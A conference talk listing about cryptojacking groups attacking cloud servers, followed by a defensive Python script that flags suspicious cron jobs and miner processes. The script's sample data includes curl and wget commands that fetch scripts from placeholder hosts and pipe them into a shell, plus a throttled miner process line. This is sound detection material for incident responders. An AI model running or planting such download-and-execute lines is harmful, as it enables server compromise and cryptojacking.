"The Usual Suspects" - James Condon
Author: fwd:cloudsec
Uploaded: 2020-07-10
Views: 652
Description:
"The Usual Suspects: A Look at Threat Actors Targeting the Cloud and their Battle for Superiority"
Speaker: James Condon (Lacework, Inc)
James Condon is Director of Research at Lacework, where he researches various cloud security topics. James is a security veteran with over 10 years of experience in incident response, intelligence analysis, and threat detection. Prior to Lacework, James was Director of Threat Research and Analysis at ProtectWise (acquired by Verizon). Prior to ProtectWise, James was an analyst at Mandiant where he provided network traffic analysis and forensics for several incident response engagements. James got his start in the security industry as a Special Agent in the Air Force Office of Special Investigations.
Abstract:
Do you ever wonder who is behind the cryptojacking attacks targeting the cloud? If you examine a compromised server you will notice multiple attackers creating a chaotic mess of cron jobs, services, processes, and network connections. You will see evidence of different entities attempting to grab a foothold on the victim system. This talk takes a look at the actors and their tactics behind this activity.
Cloud resources make a lucrative target for cryptojacking. To run a successful campaign, an attacker must compromise servers and remain persistent long enough to turn a profit. To stay persistent, the attacker must evade detection by the owners, typically by installing rootkits, adding multiple forms of persistence, and setting CPU limits to avoid alarms. Once this is complete, mission accomplished, right? Not quite.
As it turns out, cryptojacking is so popular that many actors are competing for the same resources. This results in attackers booting out anyone else that gets in their way. As seen in malicious scripts and binaries, attackers scramble to keep up with other attackers' TTPs, all while managing infrastructure in hopes that it doesn't get blacklisted.
This talk will discuss one of the first players to the game, the 8220 mining group, and how they target cloud-native technologies along with traditional applications. The very prolific group Rocke, whose origins begin with a fork of an 8220 mining group GitHub repo, is examined along with their continually evolving tactics. The talk also looks at Pacha, a group that adopts the tactics of their competitors while simultaneously disrupting their operations. Here you will learn about these groups and what they are likely to target. This talk is geared towards operators and incident responders who need to detect, prevent and remediate these attacks. It's also geared for those who are curious about what is happening behind the scenes and those who enjoy the quirks of attacker behavior.
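As an added illustration for the responders the abstract addresses (example code, not material from the talk or from Lacework), the triage logic below flags the kinds of artifacts described above in a constructed crontab and process listing: cron entries that pipe a downloaded script into a shell, binaries running from temp directories under kernel-thread names, and miner-style flags such as a pool address and CPU throttling. All hostnames, IPs and paths in the sample data are constructed placeholders.

```python
import re

# Constructed sample data (not from the talk): a user crontab and a process table
# of the kind an incident responder would collect from a suspect cloud host.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://dropper.example.invalid/i.sh | sh
* * * * * wget -q -O- http://203.0.113.10/x.sh | bash > /dev/null 2>&1
@reboot /tmp/.x/kswapd0
"""

SAMPLE_PS = """\
PID  %CPU COMMAND
1    0.0  /sbin/init
842  0.3  /usr/sbin/sshd -D
1337 41.0 /tmp/.x/kswapd0 -o pool.example.invalid:3333 --max-cpu-usage 50
2001 2.1  /usr/bin/python3 /opt/app/server.py
"""

# Patterns drawn from the tactics the abstract describes: cron entries that fetch
# a remote script and pipe it into a shell, executables living in temp dirs that
# impersonate kernel threads, and miner-style flags such as CPU throttling.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")
TMP_EXEC = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")
MINER_FLAGS = re.compile(r"(-o\s+\S+:\d+|--max-cpu-usage|stratum\+tcp)")
KERNEL_LOOKALIKE = re.compile(r"/(kswapd0|kthreadd|ksoftirqd)\b")


def suspicious_cron_entries(crontab_text):
    """Return crontab lines matching download-and-execute or temp-dir persistence."""
    hits = []
    for line in crontab_text.splitlines():
        if not line or line.startswith("#"):
            continue  # skip comments and blank lines
        if DOWNLOAD_EXEC.search(line) or TMP_EXEC.search(line):
            hits.append(line)
    return hits


def suspicious_processes(ps_text):
    """Return (pid, command) for processes that look like throttled miners."""
    hits = []
    for line in ps_text.splitlines()[1:]:  # skip the ps header row
        pid, _cpu, cmd = line.split(maxsplit=2)
        if MINER_FLAGS.search(cmd) or (TMP_EXEC.search(cmd) and KERNEL_LOOKALIKE.search(cmd)):
            hits.append((int(pid), cmd))
    return hits
```

On the sample data, the three malicious cron lines are returned while the certbot entry is not, and only the throttled miner process is flagged.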